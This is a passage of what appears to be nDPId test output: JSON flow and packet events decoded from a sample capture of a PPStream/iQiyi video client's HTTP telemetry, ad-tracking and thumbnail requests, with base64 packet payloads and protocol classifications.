lZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHT